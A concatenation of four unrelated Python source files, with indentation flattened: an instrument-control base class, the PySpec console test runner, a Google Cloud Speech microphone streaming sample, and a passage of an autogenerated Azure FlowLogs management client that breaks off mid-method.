:param docs: A docstring that will be included in the documentation
:param validator: A function that takes both a value and a group of valid values
and returns a valid value, while it otherwise raises an exception
:param values: A list, range, or dictionary of valid values, that can be used
as to map values if :code:`map_values` is True.
:param map_values: A boolean flag that determines if the values should be
interpreted as a map
:param get_process: A function that take a value and allows processing
before value mapping, returning the processed value
:param set_process: A function that takes a value and allows processing
before value mapping, returning the processed value
:param check_set_errors: Toggles checking errors after setting
:param check_get_errors: Toggles checking errors after getting
"""
if map_values and type(values) is dict:
# Prepare the inverse values for performance
inverse = {v: k for k, v in values.items()}
def fget(self):
vals = self.values(get_command, **kwargs)
if check_get_errors:
self.check_errors()
if len(vals) == 1:
value = get_process(vals[0])
if not map_values:
return value
elif type(values) in (list, range):
return values[int(value)]
elif type(values) is dict:
return inverse[value]
else:
raise ValueError(
'Values of type `{}` are not allowed '
'for Instrument.control'.format(type(values))
)
else:
vals = get_process(vals)
return vals
def fset(self, value):
value = set_process(validator(value, values))
if not map_values:
pass
elif type(values) in (list, range):
value = values.index(value)
elif type(values) is dict:
value = values[value]
else:
raise ValueError(
'Values of type `{}` are not allowed '
'for Instrument.control'.format(type(values))
)
self.write(set_command % value)
if check_set_errors:
self.check_errors()
# Add the specified document string to the getter
fget.__doc__ = docs
return property(fget, fset)
@staticmethod
def measurement(get_command, docs, values=[], map_values=None,
get_process=lambda v: v, command_process=lambda c: c,
check_get_errors=False, **kwargs):
""" Returns a property for the class based on the supplied
commands. This is a measurement quantity that may only be
read from the instrument, not set.
:param get_command: A string command that asks for the value
:param docs: A docstring that will be included in the documentation
:param values: A list, range, or dictionary of valid values, that can be used
as to map values if :code:`map_values` is True.
:param map_values: A boolean flag that determines if the values should be
interpreted as a map
:param get_process: A function that take a value and allows processing
before value mapping, returning the processed value
:param command_process: A function that take a command and allows processing
before executing the command, for both getting and setting
:param check_get_errors: Toggles checking errors after getting
"""
if map_values and type(values) is dict:
# Prepare the inverse values for performance
inverse = {v: k for k, v in values.items()}
def fget(self):
vals = self.values(command_process(get_command), **kwargs)
if check_get_errors:
self.check_errors()
if len(vals) == 1:
value = get_process(vals[0])
if not map_values:
return value
elif type(values) in (list, range):
return values[int(value)]
elif type(values) is dict:
return inverse[value]
else:
raise ValueError(
'Values of type `{}` are not allowed '
'for Instrument.measurement'.format(type(values))
)
else:
return get_process(vals)
# Add the specified document string to the getter
fget.__doc__ = docs
return property(fget)
@staticmethod
def setting(set_command, docs,
validator=lambda x, y: x, values=[], map_values=False,
check_set_errors=False,
**kwargs):
"""Returns a property for the class based on the supplied
commands. This property may be set, but raises an exception
when being read from the instrument.
:param set_command: A string command that writes the value
:param docs: A docstring that will be included in the documentation
:param validator: A function that takes both a value and a group of valid values
and returns a valid value, while it otherwise raises an exception
:param values: A list, range, or dictionary of valid values, that can be used
as to map values if :code:`map_values` is True.
:param map_values: A boolean flag that determines if the values should be
interpreted as a map
:param check_set_errors: Toggles checking errors after setting
"""
if map_values and type(values) is dict:
# Prepare the inverse values for performance
inverse = {v: k for k, v in values.items()}
def fget(self):
raise LookupError("Instrument.setting properties can not be read.")
def fset(self, value):
value = validator(value, values)
if not map_values:
pass
elif type(values) in (list, range):
value = values.index(value)
elif type(values) is dict:
value = values[value]
else:
raise ValueError(
'Values of type `{}` are not allowed '
'for Instrument.control'.format(type(values))
)
self.write(set_command % value)
if check_set_errors:
self.check_errors()
# Add the specified document string to the getter
fget.__doc__ = docs
return property(fget, fset)
# TODO: Determine case basis for the addition of this method
def clear(self):
""" Clears the instrument status byte
"""
self.write("*CLS")
# TODO: Determine case basis for the addition of this method
def reset(self):
""" Resets the instrument. """
self.write("*RST")
def shutdown(self):
"""Brings the instrument to a safe and stable state"""
self.isShutdown = True
log.info("Shutting down %s" % self.name)
def check_errors(self):
"""Return any accumulated errors. Must be reimplemented by subclasses.
"""
pass
class FakeInstrument(Instrument):
""" Provides a fake implementation of the Instrument class
for testing purposes.
"""
def __init__(self, **kwargs):
super(FakeInstrument, self).__init__(
FakeAdapter(),
"Fake Instrument",
includeSCPI=False,
**kwargs
)
| |
# -*- coding: ascii -*-
"""PySpec User Interface for console.
"""
import sys
import time
import optparse
import pyspec
import pyspec.util
import pyspec.project
import pyspec.framework
from pyspec.embedded.setting import config
import pyspec.compat_ironpython as compat
import addin
__pyspec = 1
__all__ = ("CUISpecTestRunner",)
version = """PySpec Version %s
Copyright (c) 2006-2008 Shibukawa Yoshiki.""" % pyspec.__version__
class CUISetting(object):
def __init__(self):
self.verbosity = True
self.color = False
self.output_encoding = None
self.show_legacy_data = False
class CUISpecResultRecorder(pyspec.framework.SpecResultRecorder):
"""This class prints formatted CUI test records to a stream.
Used by CUITestRunner.
"""
separator1 = '=' * 70
separator2 = '-' * 70
def __init__(self):
super(CUISpecResultRecorder, self).__init__()
self.out = sys.stdout
self.load_error_specs = set()
self.load_errors = set()
if config.cui.output_encoding:
self.out = compat.get_console_encoder(config.cui.output_encoding)
else:
self.out = sys.stdout
self.starttime = None
def start_test(self, spec, contexts=None, data_args=None):
super(CUISpecResultRecorder, self).start_test(spec, contexts, data_args)
if not config.cui.verbosity:
return
if data_args:
append_text = " <args=%s>" % " ".join(
("%s:%s" % (key, value) for key, value in data_args.iteritems()))
else:
append_text = ""
if contexts is None:
#print str(spec)
self.out.write("\n" + spec.spec_name() + append_text)
else:
for context in contexts:
self.out.write("\n" + context.spec_name(context=True))
self.out.write("\n " + spec.spec_name() + append_text)
self.out.write(" ... ")
def add_success(self, spec):
super(CUISpecResultRecorder, self).add_success(spec)
if config.cui.color:
self.out.write("\x1b[20m")
if config.cui.verbosity:
self.out.write("OK")
else:
self.out.write(".")
if config.cui.color:
self.out.write("\x1b[0m")
def add_error(self, spec, err):
super(CUISpecResultRecorder, self).add_error(spec, err)
if config.cui.verbosity:
self.out.write("Error")
else:
self.out.write("E")
def add_failure(self, spec, err):
super(CUISpecResultRecorder, self).add_failure(spec, err)
if config.cui.verbosity:
self.out.write("Failure")
else:
self.out.write("F")
def add_ignore(self, spec, message=None):
super(CUISpecResultRecorder, self).add_ignore(spec, message)
if config.cui.verbosity:
self.out.write("Ignored")
else:
self.out.write("I")
def add_load_error(self, filepath, error_message):
self.load_error_tests.add(filepath)
self.load_errors.add("".join(error_message))
def has_load_error(self):
return len(self.load_errors) > 0
def begin_test(self):
self.starttime = time.time()
def finish_test(self):
takentime = time.time() - self.starttime
self.print_errors()
print self.separator2
run = self.run_count
print "Ran %d spec%s in %.3fs" % (run, run != 1 and "s" or "", takentime)
if not self.was_successful():
records = []
failed, errored = map(len, (self.failures, self.errors))
if failed:
records.append("failures=%d" % failed)
if errored:
records.append("errors=%d" % errored)
print "FAILED(%s)" % (", ".join(records))
else:
print "OK"
def print_errors(self):
print >>self.out, "\n"
self.print_error_list('ERROR', self.errors)
self.print_error_list('FAIL', self.failures)
self.print_ignore_list()
self.print_load_error()
print >>self.out, "\n"
def print_error_list(self, flavour, errors):
for spec, err in errors:
print >>self.out, self.separator1
print >>self.out, "%s: %s" % (flavour,spec.spec_name(long=True))
print >>self.out, self.separator2
print >>self.out, err
self.print_console(spec)
def print_load_error(self):
if self.load_error_specs:
print >>self.out, self.separator1
print >>self.out, "Load Error:"
for spec in self.load_error_specs:
print >>self.out, " %s" % spec
print >>self.out, self.separator2
for message in self.load_errors:
print >>self.out, message, "\n"
print >>self.out, "No specs ran. Fix syntax errors first."
def print_console(self, spec):
if config.cui.verbosity and spec.console:
print >>self.out, "Console:"
for line in spec.console:
print >>self.out, line[1],
print >>self.out, ""
def print_ignore_list(self):
splitter = ''
for spec, message in self.ignores:
print >>self.out, splitter,
print >>self.out, self.separator1
print >>self.out, "Ignored Tests: %s" % spec.spec_name(long=True)
print >>self.out, self.separator2
if message:
print >>self.out, "%s\n" % message
else:
print >>self.out, ''
self.print_console(spec)
splitter = '\n'
class CUISpecTestRunner(object):
"""A test runner class that displays results in textual form.
It prints out the names of tests as they are run, errors as they
occur, and a summary of the results at the end of the test run.
"""
def __init__(self, auto=False):
self.is_changed = False
self.project = pyspec.project.PySpecProject()
self.auto = auto
self.kernel = pyspec.framework.PySpecKernel()
self.addin = addin.CUIAddinManager(self.kernel)
self.addin.load_addin()
if auto:
self._parse_options_in_auto_mode()
else:
self._parse_options_in_manual_mode()
compat.patch_for_iron_python()
def _run_option_parsing(self, auto_mode, use_ini_file=False):
"""Run option parsing."""
usage = "usage: %prog [options] spec_modules..."
parser = optparse.OptionParser(usage=usage, version=version)
parser.add_option("-v", "--verbose", action="store_true",
dest="verbose", default=True,
help="make lots of information [default].")
parser.add_option("-q", "--quiet", action="store_false",
dest="verbose",
help="ouput progress bar and result only")
parser.add_option("-c", "--color", action="store_true",
dest="color", default=False,
help="color output")
parser.add_option("-d", "--check-docstring", action="store_true",
dest="check_docstring", default=False,
help="verify test fails if the test has no docstring.")
parser.add_option("-r", "--reset-legacy-data", action="store_true",
dest="reset_legacy_data", default=False,
help="reset all legacy test data.")
parser.add_option("--show-legacy-data", action="store_true",
dest="show_legacy_data", default=False,
help="show recorded legacy test data.")
parser.add_option("-g", "--language", metavar="LANG",
default='en',
help="change the report language.(sometimes it needs -e)\n"
"supported code: %s" % ", ".join(config.language.support.keys()))
if use_ini_file:
parser.add_option("-l", "--load", metavar="PROJECT.pyspec",
help="load spec modules and settings from project file")
parser.add_option("-s", "--save", metavar="PROJECT.pyspec",
help="save spec modules and settings to project file")
parser.add_option("-e", "--encode", metavar="OUTPUT_CODEC",
help="set console encode")
parser.add_option("--debug-pyspec", action="store_true",
dest="debug_pyspec", default=False,
help="show pyspec internal error traceback.")
self.addin.call_event_handler("init_optparse", parser)
options, specs = parser.parse_args()
if options.encode is not None:
self.project.cui_encoding = options.encode
if use_ini_file and options.load is not None:
self.is_changed = True
config.framework.check_docstring = options.check_docstring
config.framework.reset_legacy_data = options.reset_legacy_data
config.environment.show_error = options.debug_pyspec
config.language.set_language(options.language)
cui_config = CUISetting()
cui_config.verbosity = options.verbose
cui_config.color = options.color
cui_config.show_legacy_data = options.show_legacy_data
cui_config.output_encoding = options.encode
config.regist_config("cui", cui_config)
if not auto_mode and len(specs) == 0:
parser.print_help()
print "\nThere is no spec."
sys.exit(0)
self.addin.call_event_handler("read_option", options, specs)
return (options, specs)
def _parse_options_in_auto_mode(self):
"""Parse test option in auto mode.
Run spec with run_test() method, pyspec become auto mode.
"""
options, specs = self._run_option_parsing(auto_mode=True)
def _parse_options_in_manual_mode(self):
"""Read test option file.
Run spec with cuipyspec, pyspec become manual mode.
"""
options, specs = self._run_option_parsing(auto_mode=False,
use_ini_file=True)
if options.load is not None:
self.project.read(options.load)
if options.save is not None:
self.project.set_filepath(options.save)
self.is_changed = True
elif options.save is not None:
self.project.set_filepath(options.save)
self.is_changed = True
default_count = len(self.project.specs)
self.project.add_specs(specs)
if default_count != len(self.project.specs) and default_count != 0:
self.is_changed = True
def run(self):
"""Run the given specs.
"""
recorder = CUISpecResultRecorder()
config.load_legacy_test_data()
if config.cui.show_legacy_data:
self._show_legacy_data(recorder.out)
return None
if self.auto:
self.kernel.set_all_modules()
else:
for filepath in self.project.specs.itervalues():
self.kernel.modules.load_module(filepath)
if recorder.has_load_error():
recorder.print_errors()
return
self.addin.call_event_handler("on_run_test")
recorder.begin_test()
for spec_module in self.kernel.modules.get_modules("pyspec"):
spec_module.run(recorder)
recorder.finish_test()
self.addin.call_event_handler("on_finish_test", recorder)
config.save_legacy_test_data()
if self.is_changed:
self.project.save()
return recorder
def _show_legacy_data(self, cout):
keys = sorted(config.runtime.legacy_data.keys())
current_module = None
current_class = None
current_method = None
current_variable = None
for key in keys:
module, class_name, method, variable = key[0:4]
if module != current_module:
print >>cout, self._create_title("module: %s" % module, 1)
current_module = module
if class_name != current_class:
print >>cout, self._create_title("class: %s" % class_name, 2)
current_class = class_name
if method != current_method:
print >>cout, self._create_title("method: %s" % method, 3)
current_method = method
if variable != current_variable:
print >>cout, self._create_title("variable: %s" % variable, 4)
current_variable = variable
for call in config.runtime.legacy_data[key]:
call_repr = pyspec.util.create_method_repr(call[0], *call[1])
if call[2] is not None:
print >>cout, '%s => %s' % (call_repr, call[3])
else:
print >>cout, '%s' % call_repr
def _create_title(self, string, level):
deco1 = '=' * len(string)
deco2 = '-' * len(string)
if level == 1:
return '%s\n%s\n%s\n' % (deco1, string, deco1)
elif level == 2:
return '%s\n%s\n%s\n' % (deco2, string, deco2)
elif level == 3:
return '\n%s\n%s\n' % (string, deco1)
else:
deco = '-' * len(string)
return '\n%s\n%s\n' % (string, deco2)
| |
#!/usr/bin/python
# Copyright (C) 2016 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Sample that streams audio to the Google Cloud Speech API via GRPC."""
from __future__ import division
import contextlib
import functools
import re
import signal
import sys
from google.cloud import credentials
from google.cloud.grpc.speech.v1beta1 import cloud_speech_pb2 as cloud_speech
from google.rpc import code_pb2
from grpc.beta import implementations
from grpc.framework.interfaces.face import face
import pyaudio
from six.moves import queue
# Audio recording parameters
RATE = 16000
CHUNK = int(RATE / 10) # 100ms
# The Speech API has a streaming limit of 60 seconds of audio*, so keep the
# connection alive for that long, plus some more to give the API time to figure
# out the transcription.
# * https://g.co/cloud/speech/limits#content
DEADLINE_SECS = 60 * 3 + 5
SPEECH_SCOPE = 'https://www.googleapis.com/auth/cloud-platform'
def make_channel(host, port):
"""Creates an SSL channel with auth credentials from the environment."""
# In order to make an https call, use an ssl channel with defaults
ssl_channel = implementations.ssl_channel_credentials(None, None, None)
# Grab application default credentials from the environment
creds = credentials.get_credentials().create_scoped([SPEECH_SCOPE])
# Add a plugin to inject the creds into the header
auth_header = (
'Authorization',
'Bearer ' + creds.get_access_token().access_token)
auth_plugin = implementations.metadata_call_credentials(
lambda _, cb: cb([auth_header], None),
name='google_creds')
# compose the two together for both ssl and google auth
composite_channel = implementations.composite_channel_credentials(
ssl_channel, auth_plugin)
return implementations.secure_channel(host, port, composite_channel)
def _audio_data_generator(buff):
"""A generator that yields all available data in the given buffer.
Args:
buff - a Queue object, where each element is a chunk of data.
Yields:
A chunk of data that is the aggregate of all chunks of data in `buff`.
The function will block until at least one data chunk is available.
"""
stop = False
while not stop:
# Use a blocking get() to ensure there's at least one chunk of data.
data = [buff.get()]
# Now consume whatever other data's still buffered.
while True:
try:
data.append(buff.get(block=False))
except queue.Empty:
break
# `None` in the buffer signals that the audio stream is closed. Yield
# the final bit of the buffer and exit the loop.
if None in data:
stop = True
data.remove(None)
yield b''.join(data)
def _fill_buffer(buff, in_data, frame_count, time_info, status_flags):
"""Continuously collect data from the audio stream, into the buffer."""
buff.put(in_data)
return None, pyaudio.paContinue
# [START audio_stream]
@contextlib.contextmanager
def record_audio(rate, chunk):
"""Opens a recording stream in a context manager."""
# Create a thread-safe buffer of audio data
buff = queue.Queue()
audio_interface = pyaudio.PyAudio()
audio_stream = audio_interface.open(
format=pyaudio.paInt16,
# The API currently only supports 1-channel (mono) audio
# https://goo.gl/z757pE
channels=1, rate=rate,
input=True, frames_per_buffer=chunk,
# Run the audio stream asynchronously to fill the buffer object.
# This is necessary so that the input device's buffer doesn't overflow
# while the calling thread makes network requests, etc.
stream_callback=functools.partial(_fill_buffer, buff),
)
yield _audio_data_generator(buff)
audio_stream.stop_stream()
audio_stream.close()
# Signal the _audio_data_generator to finish
buff.put(None)
audio_interface.terminate()
# [END audio_stream]
def request_stream(data_stream, rate, interim_results=True):
"""Yields `StreamingRecognizeRequest`s constructed from a recording audio
stream.
Args:
data_stream: A generator that yields raw audio data to send.
rate: The sampling rate in hertz.
interim_results: Whether to return intermediate results, before the
transcription is finalized.
"""
# The initial request must contain metadata about the stream, so the
# server knows how to interpret it.
recognition_config = cloud_speech.RecognitionConfig(
# There are a bunch of config options you can specify. See
# https://goo.gl/KPZn97 for the full list.
encoding='LINEAR16', # raw 16-bit signed LE samples
sample_rate=rate, # the rate in hertz
# See http://g.co/cloud/speech/docs/languages
# for a list of supported languages.
language_code='en-US', # a BCP-47 language tag
)
streaming_config = cloud_speech.StreamingRecognitionConfig(
interim_results=interim_results,
config=recognition_config,
)
yield cloud_speech.StreamingRecognizeRequest(
streaming_config=streaming_config)
for data in data_stream:
# Subsequent requests can all just have the content
yield cloud_speech.StreamingRecognizeRequest(audio_content=data)
def listen_print_loop(recognize_stream):
"""Iterates through server responses and prints them.
The recognize_stream passed is a generator that will block until a response
is provided by the server. When the transcription response comes, print it.
In this case, responses are provided for interim results as well. If the
response is an interim one, print a line feed at the end of it, to allow
the next result to overwrite it, until the response is a final one. For the
final one, print a newline to preserve the finalized transcription.
"""
print("entered print loop")
num_chars_printed = 0
for resp in recognize_stream:
#print(type(resp))
if resp.error.code != code_pb2.OK:
raise RuntimeError('Server error: ' + resp.error.message)
if not resp.results:
continue
# Display the top transcription
result = resp.results[0]
transcript = result.alternatives[0].transcript
# Display interim results, but with a carriage return at the end of the
# line, so subsequent lines will overwrite them.
if not result.is_final:
# If the previous result was longer than this one, we need to print
# some extra spaces to overwrite the previous result
overwrite_chars = ' ' * max(0, num_chars_printed - len(transcript))
sys.stdout.write(transcript + overwrite_chars + '\r')
sys.stdout.flush()
num_chars_printed = len(transcript)
else:
print(transcript)
# Exit recognition if any of the transcribed phrases could be
# one of our keywords.
if re.search(r'\b(exit|quit)\b', transcript, re.I):
print('Exiting..')
break
num_chars_printed = 0
def main():
with cloud_speech.beta_create_Speech_stub(
make_channel('speech.googleapis.com', 443)) as service:
# For streaming audio from the microphone, there are three threads.
# First, a thread that collects audio data as it comes in
print("entered make_channel")
with record_audio(RATE, CHUNK) as buffered_audio_data:
print("entered record_audio")
# Second, a thread that sends requests with that data
requests = request_stream(buffered_audio_data, RATE)
# Third, a thread that listens for transcription responses
recognize_stream = service.StreamingRecognize(
requests, DEADLINE_SECS)
# Exit things cleanly on interrupt
signal.signal(signal.SIGINT, lambda *_: recognize_stream.cancel())
# Now, put the transcription responses to use.
try:
listen_print_loop(recognize_stream)
recognize_stream.cancel()
except face.CancellationError:
# This happens because of the interrupt handler
pass
if __name__ == '__main__':
main()
| |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import TYPE_CHECKING
import warnings
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpRequest, HttpResponse
from azure.core.polling import LROPoller, NoPolling, PollingMethod
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.arm_polling import ARMPolling
from .. import models as _models
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from typing import Any, Callable, Dict, Generic, Iterable, Optional, TypeVar, Union
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
class FlowLogsOperations(object):
"""FlowLogsOperations operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.network.v2020_08_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
def _create_or_update_initial(
self,
resource_group_name, # type: str
network_watcher_name, # type: str
flow_log_name, # type: str
parameters, # type: "_models.FlowLog"
**kwargs # type: Any
):
# type: (...) -> "_models.FlowLog"
cls = kwargs.pop('cls', None) # type: ClsType["_models.FlowLog"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-08-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self._create_or_update_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkWatcherName': self._serialize.url("network_watcher_name", network_watcher_name, 'str'),
'flowLogName': self._serialize.url("flow_log_name", flow_log_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'FlowLog')
body_content_kwargs['content'] = body_content
request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('FlowLog', pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize('FlowLog', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_create_or_update_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkWatchers/{networkWatcherName}/flowLogs/{flowLogName}'} # type: ignore
def begin_create_or_update(
self,
resource_group_name, # type: str
network_watcher_name, # type: str
flow_log_name, # type: str
parameters, # type: "_models.FlowLog"
**kwargs # type: Any
):
# type: (...) -> LROPoller["_models.FlowLog"]
"""Create or update a flow log for the specified network security group.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param network_watcher_name: The name of the network watcher.
:type network_watcher_name: str
:param flow_log_name: The name of the flow log.
:type flow_log_name: str
:param parameters: Parameters that define the create or update flow log resource.
:type parameters: ~azure.mgmt.network.v2020_08_01.models.FlowLog
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling.
Pass in False for this operation to not poll, or pass in your own initialized polling object for a personal polling strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of LROPoller that returns either FlowLog or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[~azure.mgmt.network.v2020_08_01.models.FlowLog]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.FlowLog"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._create_or_update_initial(
resource_group_name=resource_group_name,
network_watcher_name=network_watcher_name,
flow_log_name=flow_log_name,
parameters=parameters,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize('FlowLog', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkWatcherName': self._serialize.url("network_watcher_name", network_watcher_name, 'str'),
'flowLogName': self._serialize.url("flow_log_name", flow_log_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
if polling is True: polling_method = ARMPolling(lro_delay, lro_options={'final-state-via': 'azure-async-operation'}, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkWatchers/{networkWatcherName}/flowLogs/{flowLogName}'} # type: ignore
def update_tags(
self,
resource_group_name, # type: str
network_watcher_name, # type: str
flow_log_name, # type: str
parameters, # type: "_models.TagsObject"
**kwargs # type: Any
):
# type: (...) -> "_models.FlowLog"
"""Update tags of the specified flow log.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param network_watcher_name: The name of the network watcher.
:type network_watcher_name: str
:param flow_log_name: The name of the flow log.
:type flow_log_name: str
:param parameters: Parameters supplied to update flow log tags.
:type parameters: ~azure.mgmt.network.v2020_08_01.models.TagsObject
:keyword callable cls: A custom type or function that will be passed the direct response
:return: FlowLog, or the result of cls(response)
:rtype: ~azure.mgmt.network.v2020_08_01.models.FlowLog
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.FlowLog"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-08-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.update_tags.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkWatcherName': self._serialize.url("network_watcher_name", network_watcher_name, 'str'),
'flowLogName': self._serialize.url("flow_log_name", flow_log_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'TagsObject')
body_content_kwargs['content'] = body_content
request = self._client.patch(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('FlowLog', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
update_tags.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkWatchers/{networkWatcherName}/flowLogs/{flowLogName}'} # type: ignore
def get(
self,
resource_group_name, # type: str
network_watcher_name, # type: str
flow_log_name, # type: str
**kwargs # type: Any
):
# type: (...) -> "_models.FlowLog"
"""Gets a flow log resource by name.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param network_watcher_name: The name of the network watcher.
:type network_watcher_name: str
:param flow_log_name: The name of the flow log resource.
:type flow_log_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: FlowLog, or the result of cls(response)
:rtype: ~azure.mgmt.network.v2020_08_01.models.FlowLog
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.FlowLog"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-08-01"
accept = "application/json"
# Construct URL
url = self.get.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkWatcherName': self._serialize.url("network_watcher_name", network_watcher_name, 'str'),
'flowLogName': self._serialize.url("flow_log_name", flow_log_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('FlowLog', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkWatchers/{networkWatcherName}/flowLogs/{flowLogName}'} # type: ignore
def _delete_initial(
self,
resource_group_name, # type: str
network_watcher_name, # type: str
flow_log_name, # type: str
**kwargs # type: Any
):
# type: (...) -> None
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
